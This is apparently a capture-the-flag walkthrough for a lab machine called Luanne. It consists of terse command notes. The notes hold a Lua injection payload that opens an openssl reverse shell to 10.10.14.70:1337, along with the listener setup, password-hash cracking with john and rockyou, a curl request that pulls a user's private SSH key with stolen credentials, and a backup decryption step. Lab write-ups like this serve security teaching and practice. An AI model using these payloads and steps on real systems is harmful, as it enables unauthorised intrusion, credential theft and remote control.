xct's notes
Search…
Luanne
Notes for https://youtu.be/TlFmnbEAi1s

User

Weather app injection

1
'+..+os.execute("mkfifo+/tmp/s%3b+/bin/sh+-i+<+/tmp/s+2>%261+|+openssl+s_client+-quiet+-connect+10.10.14.70%3a1337+>+/tmp/s%3b+rm+/tmp/s")+..+'
Copied!
Catch openssl shell:
1
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
2
openssl s_server -quiet -key key.pem -cert cert.pem -port 1337
Copied!

Crack hash from .htpasswd

1
john -w=~/tools/SecLists/Passwords/Leaked-Databases/rockyou.txt hash
Copied!

Request private key

1
curl http://webapi_user:[email protected]:3001/~r.michaels/id_rsa
Copied!

Root

Decrypt

1
netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc
Copied!
Last modified 5mo ago